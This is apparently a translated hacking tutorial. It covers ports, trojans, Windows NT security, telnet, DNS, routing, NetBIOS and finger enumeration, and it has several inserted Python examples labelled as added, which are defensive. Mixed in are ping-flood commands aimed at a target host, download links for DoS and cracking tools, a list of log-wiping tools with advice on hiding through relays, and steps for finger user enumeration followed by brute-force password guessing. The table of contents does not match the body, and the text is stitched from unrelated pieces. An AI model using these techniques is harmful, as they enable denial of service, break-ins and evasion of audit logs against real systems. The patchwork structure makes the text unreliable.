Contents

11. Webcrack
12. MungaBunga
13. WinSmurf
14. Evil Ping
18. DNS
19. Routing in the Internet

1. NETBIOS
2. Finger
3. Net
4. secure shell
5. Buffer Overflows
6. CGI
7. !
10. HTTP Port
11. NeoTrace

25. IIS
26. UniCode
30. God Will
31. NOOP4
38. CgiScaner
40. Shadow Scan Security
46. .htaccess
47. FTP
48. FTP
49. SQL
50. SQL
55. PHP Shell
56. PHP Shell
57. PHP Shell
58. anmap
60. Cross Site Scripting
68. Chunked
70. vBulletin 2,2,0
72. vBulletin 2,2,9
73. phpbb 2.0.0
74. php nuke
Cross Site Scripting (CSS, now written XSS)

Finding exploits: search for the name of the hole or of the product together with the words "bug" and "exploit", e.g.
XSS+BUG+EXPLOIT
or, for IIS:
IIS+exploit+bug

Search engines:
http://www.google.com/
http://www.yahoo.com/ http://www.altavista.com/ http://www.lycos.com/ http://hotbot.lycos.com/

File sharing: kazaa - WinMX

News:
http://news.bbc.co.uk/hi/arabic/news - http://arabic.cnn.com/ http://www.aljazeera.net/

Security:
http://www.securiteam.com/ http://www.securityfocus.com/ http://www.ussrback.com/ http://www.ntbugtraq.com/ http://www.ntsecurity.nu/ http://www.ntsecurity.com/

Drivers and hardware:
http://nvidia.com/ http://www.asus.com/ http://drivers.on-line.net.nz/ http://intel.com/ http://www.amdmb.com/
IP addresses

Start > Run > winipcfg shows your own IP address. Example addresses: 212.33.40.1, 24.5.66.3. An address is four numbers (octets), each from 0 to 255, e.g. 10.10.10.1.
Address blocks are assigned by IANA (Internet Assigned Numbers Authority) through three regional registries:
1. ARIN (American Registry for Internet Numbers)
2. RIPE (Réseaux IP Européens)
3. APNIC (Asia Pacific Network Information Center)
Who owns an address or a block is found with whois, e.g. at http://www.ripe.net/db/whois.html. Addresses such as 212.26.75.34 and 212.26.75.201 share the prefix 212.26.75; searching whois for 212.26.75 returns the network they belong to.
Ports

Every service on a host listens on a port: a web server on port 80, an FTP server on port 21, NetMeeting on 1720.

DNS

DNS translates host names into IP addresses, e.g. www.cnn.com (CNN) to 207.145.53.10. Your machine asks its DNS server for the IP address before it connects to a host.

netstat

netstat, run from the MS-DOS prompt, lists the current connections: the remote IP address and port of each one. A connection joins a client to a server on a port. Internet Relay Chat (IRC) is an example: the chat client connects to the chat server, and on IRC another user's IP address can be seen (shown here partly masked as 111.222.XXX.333).

whois

www.networksolutions.com/cgi-bin/whois/whois (example domain: wagait.com, with or without www)

Common ports
21            FTP
25            SMTP
80            Web (HTTP)
110           POP3
139           NetBIOS
1720, 1503    NetMeeting
6667          Chat (IRC)
12345, 20034  NetBus
31337         BackOrifice
Threats

1. Viruses
2. Trojans: NetBus, Back Orifice, SubSeven. The server half is planted on the victim's machine (for example from a CD-ROM); the attacker's client then connects to it.
4. Password files: Windows 95/98 store saved passwords in encrypted PWL files.
5. ICQ: gives away the user's IP address.
6. Scripts.
7. FTP and SMTP services.
FTP, log files and covering your tracks (by JawaDal and z3r0)

here we G0
You need a shell account (or at least DOS). If the box reboots, you are out!
FTP: ftp://hostname. Scan the host with GFI LANguard network security scanner for port 21. Log in with ftp and use cd, lcd, dir and ls.
1. LOGS (LOG.FILES)
The log files record who logged in: the time online, the IP address (and host name), the screen resolution, the ISP.
3 log files:
- WTMP: login/logout, host and tty
- UTMP: who is online
- LASTLOG: last logins
With these log files the admin can track you down!
Hop through several hosts so the trail is longer: FTP --> host --> host --> ... and so on.
Wingate: relay through a Wingate and the target sees the Wingate's IP, not yours!
Staying anonymous on the web: watch out for spyware; run a firewall (Zone Alarm); Window Washer cleans the traces on your own machine. Search for "how to stay anonymous on the web" and "how to secure my computer".
Pretty Good Privacy (PGP): http://www.pgpi.org/
Tracks: log modifiers: ah-1_0b.tar, clear.c, cloak2.c, invisible.c, marryv11.c, wzap.c, wtmped.c, zap.c
Windows NT security

The account database is the Security Accounts Manager (SAM): a Workstation has its own local SAM, a Domain keeps the domain accounts in the domain SAM.
NT's security design was evaluated by the National Security Agency (NSA).

When a user logs on (locally or by Remote Logon) the system builds an Access Token, which is attached to every process the user starts. It contains:
1. the user's Security Identifier (SID)
2. the Group SIDs of the groups the user belongs to
3. the user's Privileges

Permissions are set on objects (files, directories, printers); Rights are granted to accounts and groups. The permission levels include No Access, which overrides everything else.

Each object has an Access Control List (ACL) made of Access Control Entries (ACE). An ACE names a SID and the access it grants or denies; there are two kinds:
1. AccessAllowed
2. AccessDenied (No Access)
When NT/2000 checks an ACL it walks the ACEs in order, comparing each ACE's SID with the SIDs in the access token. The AccessDenied ACEs are placed before the AccessAllowed ACEs, so a deny that matches one of the token's SIDs wins no matter what a later allow says.

Glossary (by BeReal)

Telnet: a client that connects to a remote host on a chosen port, e.g. to FTP on port 21 in Anonymous Mode. Start ==> Run ==> telnet.
Scanner: a program that scans a host for open ports and known holes (Exploits). Examples: Shadow Security Scanner, Stealth, Omran Fast Scanner. Most of them check IIS and CGI holes.
Exploits: programs, or simply URLs, that use a hole. Kinds: Buffer Over Flow Exploits, CGI Exploits (CGI Bugs), Unicode Exploits, PHP Exploits, DOS Exploits. Many come as C source (.c) that must be compiled first, e.g. with the Borland C++ Compiler; some are stopped by a Fire Wall.
FireWall: software or hardware that filters what comes into and goes out of a machine or a network.
Token (Shadowed Passwd): the password field of /etc/passwd holds only a token (* or x) when passwords are Shadowed; the hashes are then in the shadow file, /etc/shadow.
Anonymous: an account that needs no password of its own, e.g. anonymous FTP.
Vulnerabilities: holes found in a program or server (the program is Vulnerable). They are published on sites such as Security Focus.
passwd file: the file listing the system's users and, unless shadowed, their password hashes.
root: the administrator account on Unix, and the goal of most attacks.
Server: a machine that stays online 24 hours a day to serve clients.
Buffer over Flow: sending more data than the program's buffer holds, so the rest overwrites memory; used to crash the program (DOS) or to run code.
DOS: denial of service, making a service unavailable.
Webcrack

Download: http://www.dunbell.freeserve.co.uk/webcrack40.zip
MungaBunga (by KING HAKER)

MUNGA BUNGA is used in 14 steps (in steps 2 and 3 press BROWSE to choose the files). A description of the program and its settings: http://koti.mbnet.fi/hypnosis/caliberx/cracking.htm
WinSmurf

winsmurf takes its list of hosts from a txt file; the program is about 10 Kb.
Download: http://www.planeteagle.de/files/WSmurf.zip
Evil Ping

A ping flooder; the example sends 200 pings at the target.
Download: http://www.geocities.com/boom_q8y4/dorrah.zip
Ping

ping www.xx.com
The reply tells you whether the host is reachable and how long the round trip takes. Useful options: -n (number of packets), -l (packet size in bytes), -t (keep pinging until stopped). To load a host:
ping -n 1000 -l 400 www.xxx.com
ping -t ip
where ip is the target's address.
Telnet on Windows 2000

A Windows 2000 box runs the Telnet service (port 23), which lets you log on to it remotely. The following is Microsoft's description of the service and its tools.

Telnet Authentication
You can use your local Windows 2000 user name and password or domain account information to access the Telnet server. The security scheme is integrated into Windows 2000 security. If you do not use the NT LAN Manager (NTLM) authentication option, the user name and password are sent to the Telnet server as plain text. If you are using NTLM authentication, the client uses the Windows 2000 security context for authentication and the user is not prompted for a user name and password. The user name and password are encrypted.
So: without NTLM, anyone sniffing the wire reads the password.

If the User Must Change Password At Next Logon option is set for a user, the user cannot log on to the Telnet service when NTLM authentication is used. The user must log on to the server directly and change the password, and then log on through the Telnet client.

In a Windows 2000 Server default installation, the Telnet service is set to manual startup. You can use the Services snap-in or the Computer Management snap-in to start, stop, or configure the Telnet service for automatic startup.

In the Computer Management snap-in, Telnet is a service located under the Services and Applications node. Select Services from the console tree, and then select Telnet from the list of services in the details pane.

You can also start or stop the Telnet service from a command prompt. To start Telnet Server, type net start tlntsvr or net start telnet at the command prompt, and then press Enter. To stop Telnet Server, type net stop tlntsvr or net stop telnet at the command prompt, and then press Enter.

Telnet Server Admin
You can use the Telnet Server Admin utility to start, stop, or get information about Telnet Server. You can also use it to get a list of current users, terminate a user's session, or change Telnet Server registry settings.
Telnet Server Admin is opened from Administrative Tools (Telnet Administration Tool) or with Start, Run, tlntadmn, OK; it is also part of the administration pack (Adminpak.msi). Its Telnet Server Administration menu offers:
- Quit this application
- List the current users
- Terminate a user session
- Display/change registry settings
- Start the service
- Stop the service
Possible errors: Invalid input; Failed to open the registry key; Failed to query the registry value.

Telnet Client
You can use Microsoft Telnet Client to connect to a remote computer running the Telnet service or other Telnet server software. Once you have made this connection, you can communicate with the Telnet server. The type of session you conduct depends on how the Telnet software is configured. Communication, games, system administration, and local logon simulations are some typical uses of Telnet.

The Telnet client uses the Telnet protocol, part of the TCP/IP suite of protocols, to connect to a remote computer over a network. The Telnet client software allows a computer to connect to a remote server. You can use the Telnet client provided with Windows 2000 to connect to a remote computer, log on to the remote computer, and interact with it as if you were sitting in front of it.

Users of previous versions of Microsoft's Telnet client may notice a few changes in the version included with Windows 2000. The most obvious change is that Microsoft Telnet Client is now a command-line application rather than a Windows application. As a command-line application, Microsoft Telnet Client will seem very familiar to users of UNIX-based Telnet clients.

An important new feature found in Microsoft Telnet Client is NTLM authentication support. Using this feature, a computer using Microsoft Telnet Client can log on to a Windows 2000 computer running the Telnet service by using NTLM authentication.

The client is started with Start, Run, telnet. To display help for Telnet, type help at the Microsoft Telnet command prompt. To connect to a site, type open <computer_name> where <computer_name> is the IP address or host name of the computer running the Telnet service.

Worked example: two machines, Hishem1 and Hishem2. Hishem1 (logged on as Administrator) will connect to Hishem2.
On Hishem2: Start, Programs, Administrative Tools, Services; open Telnet in the Services list. In The Telnet Properties (Local Computer) dialog change Startup Type from Manual to Automatic, click Start under Service status, then OK, and close Services.
On Hishem1: Start, Run, telnet, OK. Type help (or ?) to see the commands, then open Hishem2 (o is short for open) and log on to Hishem2. You now have a command prompt on Hishem2.
On Hishem2: Start, Run, tlntadmn, OK opens Telnet Server Admin. Option 1 lists the current users (it shows the user NOR logged on from Hishem1's IP); option 2 terminates a user session; option 1 again shows the session gone.

Reading mail with telnet: Start, Run, Telnet, then open pop.mail.yahoo.com 110 and type
user xxxx
pass xxxx
(replace xxxx with your login and password). After the server's Ok, list shows the messages in the box and dele deletes one. On a plain pop connection the password travels in clear, exactly as with a non-NTLM telnet logon.

Telnet client commands
open [\\RemoteServer] [Port]
  \\RemoteServer is the computer to connect to; Port is the port number (by default the Telnet port, 23). o is short for open. Example, connecting to Redmond on port 44:
  o redmond 44
close [\\RemoteServer]
  Ends the Telnet connection. c is short for close. Example:
  c redmond 44
send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch] [?]
  Sends Telnet commands to the server: ao aborts output; ayt sends "Are you there?"; esc sends the escape character; ip interrupts the process; synch performs the Telnet synch operation; ? lists them.
display
  Shows the current Telnet client settings (the options of the Telnet session).
To leave a session and get the Telnet prompt press CTRL+]; press ENTER to return to the session.

tlntadmn
Administers the Telnet service.
tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue]
  \\RemoteServer is the server to administer (the local machine if omitted). start, stop, pause and continue control the Telnet service.
  tlntadmn on Windows 2000 administers the Windows 2000 Telnet service; the Windows XP version differs.
tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger]
  Maximum number of simultaneous Telnet connections; the default is 10.
tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger]
  Maximum number of failed login attempts before the user is disconnected; the default is 100.
tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss]
  Idle time after which a session is closed.
tlntadmn /? shows the help.
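The POP3 dialogue typed by hand above (user, pass, list, dele), as an added example that is not part of the original chapter. The server side is a small in-process state machine with a constructed mailbox and a constructed login (xxxx/xxxx, as in the text), so the exchange runs without a network; the client records the transcript of both sides, and a helper pulls out what a sniffer on the path would see: the PASS line, password included, which is the reason to use POP3 over TLS (port 995) rather than a plain port-110 session.

```python
"""POP3 exchange: USER, PASS, LIST, DELE, QUIT and the +OK / -ERR replies.

Added example, not from the original page. The server is an in-process
state machine with a constructed mailbox and constructed credentials; the
client drives it and keeps a transcript of both sides.
"""

ACCOUNTS = {"xxxx": "xxxx"}                       # constructed login -> password
MAILBOX = {
    1: b"From: a@example.net\r\n\r\nhi\r\n",     # constructed messages
    2: b"From: b@example.net\r\n\r\nbye\r\n",
}


class Pop3Server:
    def __init__(self, accounts, mailbox):
        self.accounts = accounts
        self.mailbox = dict(mailbox)
        self.user, self.authed, self.deleted = None, False, set()

    def greeting(self):
        return "+OK POP3 server ready"

    def handle(self, line):
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            self.user = arg
            return "+OK"
        if cmd == "PASS":
            # One reply for unknown user and wrong password: no account oracle.
            if self.user in self.accounts and self.accounts[self.user] == arg:
                self.authed = True
                return "+OK logged in"
            return "-ERR invalid login"
        if cmd == "QUIT":
            if self.authed:
                for n in self.deleted:            # deletions commit only at QUIT
                    del self.mailbox[n]
            return "+OK bye"
        if not self.authed:
            return "-ERR not authenticated"
        if cmd == "LIST":
            live = [(n, len(m)) for n, m in self.mailbox.items() if n not in self.deleted]
            return "+OK\r\n" + "".join(f"{n} {size}\r\n" for n, size in live) + "."
        if cmd == "DELE":
            if arg.isdigit() and int(arg) in self.mailbox and int(arg) not in self.deleted:
                self.deleted.add(int(arg))
                return f"+OK message {arg} deleted"
            return "-ERR no such message"
        return "-ERR unknown command"


def session(server, commands):
    """Client side: send each command in turn; return [(who, text), ...]."""
    transcript = [("S", server.greeting())]
    for c in commands:
        transcript.append(("C", c))
        transcript.append(("S", server.handle(c)))
    return transcript


def cleartext_secrets(transcript):
    """What a sniffer on the path sees: every PASS line, password included."""
    return [text for who, text in transcript if who == "C" and text.upper().startswith("PASS ")]


def demo():
    """The chapter's session: user, pass, list, dele 1, quit."""
    srv = Pop3Server(ACCOUNTS, MAILBOX)
    t = session(srv, ["user xxxx", "pass xxxx", "list", "dele 1", "quit"])
    return t, srv
```

Run demo() to get the transcript and the server state after QUIT; message 1 is gone only because QUIT committed the DELE, which is also why closing the telnet window without quit leaves the mailbox unchanged.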

DNS (by Dark Devil)

What is DNS?
==============
DNS is the Domain Name System. It runs on port 53 and translates alphabetical hostnames such as http://www.burn.com/ into IP ADDRESSES (the example on the page uses 127.0.0.1). This is called address resolution: people work with names, the network works with IP addresses, and DNS resolves one into the other.
Before DNS, address resolution used a HOST FILE listing every host and its IP address, kept by the Stanford Research Institute's Network Information Center (SRI-NIC); every UPDATE had to be fetched from SRI-NIC with FTP. As the Internet grew this file became unmanageable, and DNS replaced it with a decentralized database: each DNS server holds the names of its own domain and asks other DNS servers for the rest.

THE DNS SERVER
================
The DNS SERVER usually runs on UNIX and is usually BIND (Berkeley Internet Name Domain). DNS has two parts: the name server itself (the daemon program that listens to port 53) and the RESOLVER, the client side that asks a NAME SERVER. When you request http://www.burn.com/ your resolver asks the DNS server for the IP address of http://www.burn.com/, and the daemon program answers or passes the question on.

THE TREE INFORMATION
======================
Names form a tree, and so do the DNS SERVERS. Your ISP, say isp.co.uk, runs a DNS server with the hostname dns.isp.co.uk; when you ask for the IP address of http://www.burn.com/ it is dns.isp.co.uk that is asked. A DNS SERVER knows the names under its own domain and forwards other requests to the server responsible for them: dns.isp.co.uk, some-organization.org.uk, school.edu.uk, university.ac.uk, england.gov.uk and airforce.mil.uk all hang under the UK branch. At the top are the ROOT servers, which know which server holds each top-level DOMAIN NAME.

When and why does DNS "hang" or fail?
=======================================
If the DNS server is down, the browser cannot turn the name into an IP address even though the ISP connection itself works. The resolver waits (about 15 seconds) and then reports that the address could not be found (HOST unknown) or that the request TIMED OUT. Pressing REFRESH or RELOAD only repeats the query; if the server is still down it fails again.
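The resolver-to-name-server exchange this chapter describes, as an added example that is not part of the original text: Python code that builds the DNS query for the chapter's www.burn.com and parses an answer. The answer is constructed in the same script (no packet leaves the machine) and returns the 127.0.0.1 of the chapter's example; it uses the name-compression pointers real servers send. The transaction-id check is the one defence a stub resolver has against a forged reply that races the real one.

```python
"""Build a DNS query and parse the answer, the port-53 exchange the chapter
describes between a resolver and a name server.

Added example, not from the original page. The query is for the page's
www.burn.com; the response is constructed here (no network traffic) and
carries the compression pointer (0xC00C) that real answers use.
"""
import struct

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """'www.burn.com' -> b'\\x03www\\x04burn\\x03com\\x00' (length-prefixed labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("label length must be 1..63")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name, txid=0x1234, qtype=QTYPE_A):
    """Header (id, flags=RD, 1 question) followed by the question section."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def decode_name(msg, offset, depth=0):
    """Decode a (possibly compressed) name at offset; return (name, next_offset)."""
    if depth > 16:
        raise ValueError("compression pointer loop")
    labels = []
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                       # pointer to an earlier name
            ptr = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if ptr >= offset:
                raise ValueError("forward pointer")      # only backward pointers are legal
            name, _ = decode_name(msg, ptr, depth + 1)
            labels.append(name)
            return ".".join(labels), offset + 2
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def parse_response(msg, expected_txid):
    """Return {'rcode': n, 'answers': [(name, ttl, ip), ...]} for the A records.
    The id must match the query we sent; a reply with another id is dropped,
    which is what stops the simplest spoofed-answer attack."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid:
        raise ValueError("transaction id mismatch (possible spoofed reply)")
    if not flags & 0x8000:
        raise ValueError("not a response")
    offset = 12
    for _ in range(qd):                                 # skip the echoed question(s)
        _, offset = decode_name(msg, offset)
        offset += 4
    answers = []
    for _ in range(an):
        name, offset = decode_name(msg, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        offset += rdlen
        if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
            answers.append((name, ttl, ".".join(str(b) for b in rdata)))
    return {"rcode": flags & 0xF, "answers": answers}


def build_response(query, ip, ttl=300):
    """Constructed server reply to `query`: echo the question, then one A record
    whose owner name is a pointer (0xC00C) back to the question name."""
    txid = struct.unpack("!H", query[:2])[0]
    question = query[12:]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    rr = b"\xC0\x0C" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
    rr += bytes(int(o) for o in ip.split("."))
    return header + question + rr


def resolve_offline(name, ip="127.0.0.1"):
    """Round trip through the builder and the parser without touching the network."""
    query = build_query(name)
    return parse_response(build_response(query, ip), 0x1234)
```

To use it against a real server, send build_query(...) over UDP to port 53 and pass the datagram you get back to parse_response with the same id; the offline round trip is there so the packet layout can be checked without a network.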

Routing in the Internet (by Dark Devil)

what is routing?!
Routing is how a packet finds its way from one network to another across the Internet. It involves three things:
1. Physical Address Determination
2. Selection of inter-network gateways
3. Symbolic and Numeric Addresses
Every packet carries the ip address of its sender and of its destination. On the local network a packet is delivered by hardware address (inclusion of a local network address or physical address within the frame). Local networks are joined by gateways, today called routers, which forward packets between networks: that is ip routing. The symbolic name a user types, such as http://www.burn.com/, is translated into an ip address first (address translation, done by DNS as the DNS chapter describes).

Physical Address Determination
==============================
Before ip data can be sent on the local network, the ip address of the next hop must be turned into its physical address. The mapping from ip to physical addresses is done by ARP, the Address Resolution Protocol, and the answers are kept for a while in the ARP cache, which arp -a displays:

C:\WINDOWS>arp -a
Interface: 62.135.9.102 on Interface 0x2
  Internet Address      Physical Address      Type
  207.46.226.17         20-53-52-43-00-00     dynamic
  213.131.64.2          20-53-52-43-00-00     dynamic
  213.131.65.238        20-53-52-43-00-00     dynamic

Physical Address is the Mac Address. Here every ip maps to the same physical address because on a dial-up link all packets go to the router, which forwards them. Type dynamic means the entry was learned by ARP and expires; static entries are set by hand and stay, which is how routers are usually pinned down.
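Reading the ARP cache the way a defender does, as an added example that is not part of the original chapter: a Python parser for arp -a output (the Windows format shown above and the common Linux format) plus two checks. The sample output is constructed; the Windows lines copy the chapter's table. Several IPs resolving to one MAC is what ARP spoofing looks like from the victim's side, but it is also what a router or a PPP dial-up interface looks like (the chapter's own capture shows the placeholder MAC Windows uses for a dial-up adapter), so the function reports it as a lead, and the gateway check pins down the one entry an attacker has to poison.

```python
"""Parse `arp -a` output and flag suspicious ARP cache entries.

Added example, not from the original page. Handles the Windows format shown
in the chapter (dashed MAC, dynamic/static type) and the usual Linux format.
The sample output below is constructed; the Windows lines repeat the
chapter's table.
"""
import re
from collections import defaultdict

# Windows:  207.46.226.17   20-53-52-43-00-00   dynamic
WIN_RE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(dynamic|static)\s*$",
    re.I,
)
# Linux:    gateway (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
LINUX_RE = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I)

SAMPLE_WINDOWS = """\
Interface: 62.135.9.102 on Interface 0x2
  Internet Address      Physical Address      Type
  207.46.226.17         20-53-52-43-00-00     dynamic
  213.131.64.2          20-53-52-43-00-00     dynamic
  213.131.65.238        20-53-52-43-00-00     dynamic
"""
SAMPLE_LINUX = """\
gateway (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.20) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.30) at aa:bb:cc:dd:ee:01 [ether] on eth0
"""


def normalise_mac(mac):
    return mac.lower().replace("-", ":")


def parse_arp(text):
    """Return [(ip, mac, type), ...] with MACs normalised to aa:bb:cc:dd:ee:ff."""
    entries = []
    for line in text.splitlines():
        m = WIN_RE.match(line)
        if m:
            ip, mac, typ = m.groups()
            entries.append((ip, normalise_mac(mac), typ.lower()))
            continue
        m = LINUX_RE.search(line)
        if m:
            ip, mac = m.groups()
            entries.append((ip, normalise_mac(mac), "dynamic"))
    return entries


def find_shared_macs(entries):
    """{mac: [ip, ...]} for every MAC that several IPs resolve to.
    One station answering ARP for many addresses is what an ARP spoofer
    looks like; it is also what a router or a dial-up interface looks like,
    so treat the result as a lead to check, not as proof."""
    by_mac = defaultdict(set)
    for ip, mac, _ in entries:
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def check_gateway(entries, gateway_ip, expected_mac):
    """True if the cache still maps the gateway to the MAC you know is right.
    The gateway entry is the one a man-in-the-middle has to poison."""
    expected = normalise_mac(expected_mac)
    return any(ip == gateway_ip and mac == expected for ip, mac, _ in entries)
```

On a real host, feed the output of arp -a into parse_arp and keep the gateway's genuine MAC somewhere the attacker cannot change (a static entry or a note); a gateway whose MAC changed between two runs is the signal worth paging on.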

NETBIOS

NetBIOS is the API behind Windows file and printer sharing; over TCP/IP it uses TCP port 139, and a Windows host answers anonymous connections on it. On NT, NetBIOS over TCP/IP can be disabled in the TCP/IP Advanced properties (WINS tab).
To stop anonymous enumeration set RestrictAnonymous: Administrative Tools > Local Security Policy > Local Policies > Security Options > "Additional restrictions for anonymous connections" > "No Access Without Explicit Anonymous Permissions" (RestrictAnonymous = 2 in the registry).
With NetBIOS open an attacker lists shares and users with Net View against an NT/W2000 host by IP, with the other Net commands, with Nbtscan, or with Legion, which scans whole networks for shares.
Block TCP and UDP ports 135, 139 and 445 at the router or firewall.

SNMP
On Windows 2000 the SNMP service answers to the default community name Public, which lets anyone read the host's configuration. Remove public, set Send authentication trap, and remove the LAN Manager MIB-2 extension agent with regedit under
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
(the value that names LANManagerMIB2Agent). After that the NetBIOS and TCP/IP information is no longer readable over SNMP.
Finger (by LAMeR)

The finger service runs on port 79.

>================<
1.1 Introduction
1.2 What Finger is
1.3 Using Finger
1.4 Finger and password cracking
1.5 Finger bouncing
1.6 Defence
1.7 Closing

1.2 What Finger is
>===================<
Finger is a service on port 79 that returns information about a system's users, a sort of electronic businesscard. It tells a remote user who is on the system, and it tells the admin which users are logged in. The server side is the Finger Daemon; anyone can "Finger me!". For an attacker it is the next step after the portscans, because it gives user names on the server, the first half of every login.

1.3 Using Finger
>=================<
A port scanner (e.g. superscan) tells you whether port 79 is open on, say, http://www.foobar.com/. The Finger request is sent by a client, either a finger client installed on your system or plain Telnet:
--->Telnet(client) --------request------> Finger Daemon (in Server)
From MS-DOS:
telnet www.foobar.com 79
then type the user name and press Enter. A query for "@" or "www" asks the daemon for everyone:
finger @anyname.com
finger www.anyname.com
From a unix shell:
finger @foobar.com
A reply looks like this:
Login   Name         Tty      Idle  When       Where
root    foobar sys   console  17d   Tue 10:13  node0ls3.foobar.com
<.......> <.......> <.......>
Amos Amanda
Anderson Kenneth
Bright Adrian
Doe John
<.......> <.......> <.......>
Johnson Peter
Mitnick Kevin
Munson Greg
Orwell Dennis
login is the account name, Name the real name, Tty the terminal type, Idle the idle time, When the login time and Where the host the user came from. To learn more about one user (Johnson Peter):
finger johnson@foobar.com

1.4 Finger and password cracking
>===================================<
The user names the Finger daemon gives away are half the work; the other half is the password, and many users choose weak ones. With the list of logins you run a bruteforce or wordlist password cracker against the login service, e.g. the tools at http://www.thehackerschoice.com/ or VLAD's pwscan.pl: a wordlist tries every word in a list, bruteforce tries every combination. Admin (root) accounts are the prize. Finger also helps guess accounts directly:
finger secret@foobar.com
The Finger Daemon says whether a user "secret" exists; try "test", "temp", "0000", "secret" and similar. Some daemons even list all users for
finger .@foobar.com
finger 0@foobar.com
which is not what the RFC intends!

1.5 Finger bouncing
>===================<
A finger request can be passed through a third host. With www.victim.com as the target and www.host.com as the relay:
finger @host.com@victim.com
One of the two Finger daemons receives the request and forwards it to the other, so the target's log shows the relaying host rather than your own address. The relay's own log, of course, shows you.

1.6 Defence
>=======================<
Turn the Finger daemon off, or restrict who may access it. Make sure no account has a password that a wordlist or bruteforce attack finds.
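The finger exchange this chapter describes, as an added example that is not part of the original text: a small finger daemon and client in Python, run against each other on the loopback interface. The user table is constructed (modelled on the foobar.com listing above, with a root and a johnson entry); the daemon refuses the user@host forwarding that makes bouncing possible, and answers every unknown name with the same text so it cannot serve as the account oracle the chapter describes.

```python
"""A finger (TCP/79) exchange: the client sends "username\\r\\n" (an empty
line asks for the user list); the daemon answers with text and closes.

Added example, not from the original page. The daemon listens on 127.0.0.1
on an ephemeral port with a constructed user table; the client is what
`finger user@host` or `telnet host 79` plus typing a name does.
"""
import socket
import threading

# Constructed user table: login -> (name, tty, idle, when, where)
USERS = {
    "root": ("foobar sys", "console", "17d", "Tue 10:13", "node0ls3.foobar.com"),
    "johnson": ("Johnson Peter", "pts/2", "", "Wed 09:40", "dialup-3.example.net"),
}


def finger_answer(request):
    """Daemon-side logic for one request line (CRLF already stripped)."""
    request = request.strip()
    if "@" in request:
        return "finger: forwarding service denied\r\n"      # no bounce through this host
    if request == "":
        lines = ["Login    Name            Tty      Idle  When       Where"]
        for login, (name, tty, idle, when, where) in USERS.items():
            lines.append(f"{login:<8} {name:<15} {tty:<8} {idle:<5} {when:<10} {where}")
        return "\r\n".join(lines) + "\r\n"
    if request in USERS:
        name, tty, idle, when, where = USERS[request]
        return f"Login: {request}\r\nName: {name}\r\nOn since {when} on {tty} from {where}\r\n"
    return "finger: no such user\r\n"                        # identical for every miss


def serve_once(sock):
    conn, _ = sock.accept()
    with conn:
        data = b""
        while not data.endswith(b"\n") and len(data) < 512:
            chunk = conn.recv(512)
            if not chunk:
                break
            data += chunk
        conn.sendall(finger_answer(data.decode("ascii", "replace")).encode("ascii"))


def start_daemon(requests):
    """Listen on an ephemeral loopback port; serve `requests` connections in the background."""
    sock = socket.socket()
    sock.bind(("127.0.0.1", 0))
    sock.listen(5)
    threading.Thread(target=lambda: [serve_once(sock) for _ in range(requests)], daemon=True).start()
    return sock.getsockname()[1]


def finger(host, port, user=""):
    """Client side: send the name, read until the daemon closes."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(user.encode("ascii") + b"\r\n")
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            out += chunk
    return out.decode("ascii")


def demo():
    """The chapter's four queries: the list, one user, a bounce, a guessed name."""
    port = start_daemon(4)
    return {
        "list": finger("127.0.0.1", port),
        "johnson": finger("127.0.0.1", port, "johnson"),
        "bounce": finger("127.0.0.1", port, "someone@victim.com"),
        "missing": finger("127.0.0.1", port, "secret"),
    }
```

The list reply is the reconnaissance payoff the chapter talks about; a real deployment would drop that branch (or restrict it to local clients) and leave only the per-user form, and even then the same "no such user" text for every miss keeps guessing from paying off.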

NET commands

The net commands administer a Windows NT/2000 machine from the command line. net /? lists them; net help command (e.g. net help accounts) shows the syntax of one. Where a command asks for confirmation, /y answers yes and /n answers no, e.g. net stop server /y. A service name that contains spaces is quoted ("Service Name"), e.g. net start "net logon".

Net accounts
Updates the user accounts database and modifies password and logon requirements for all accounts. Used without options it displays the current settings. The Net Logon service must be running on the computer whose accounts are changed.
net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
/forcelogoff:{minutes | no}  Minutes to wait before a user's session is forced off when the account or the valid logon hours expire; no, the default, prevents forced logoff.
/minpwlen:length  Minimum number of characters in a password (the chapter gives the range as 0 to 127).
/maxpwage:{days | unlimited}  Maximum number of days a password is valid; unlimited sets no limit. The range is 1 to 49,710 days (unlimited equals 49,710); the default is 90. /maxpwage must be greater than /minpwage.
